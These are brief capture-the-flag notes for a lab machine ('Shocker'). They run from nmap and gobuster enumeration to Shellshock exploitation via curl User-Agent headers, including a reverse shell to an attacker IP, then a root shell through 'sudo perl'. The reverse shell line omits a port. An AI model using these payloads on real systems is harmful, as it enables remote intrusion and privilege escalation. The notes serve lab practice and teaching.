10.10.10.56
ttl 63

[+]NMAP[+]
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


[+]ENUMERATION[+]
❯ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/big.txt  -x html,sh
/cgi-bin
/cgi-bin/user.sh


[+]EXPLOIT[+]
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi
https://github.com/erinzm/shellshocker

Curl Blind
❯ curl -H 'User-Agent: () { :; }; /bin/bash -c "ping -c 2 10.10.14.15"' http://10.10.10.56/cgi-bin/user.sh
❯ sudo tcpdump -i tun0 icmp -n


❯ curl -H 'User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.15 0>&1"' http://10.10.10.56/cgi-bin/user.sh
❯nc -lvnp 4444

[+]USERFLAG[+]
shelly@Shocker:/home/shelly$ cat user.txt



[+]Privilage Escalation[+]
shelly@Shocker:/home/shelly$ sudo -l
(root) NOPASSWD: /usr/bin/perl

https://gtfobins.github.io/gtfobins/perl/#shell

shelly@Shocker:/usr/bin$ sudo perl -e 'exec "/bin/sh";'
# whoami
root

# cat root.txt
7
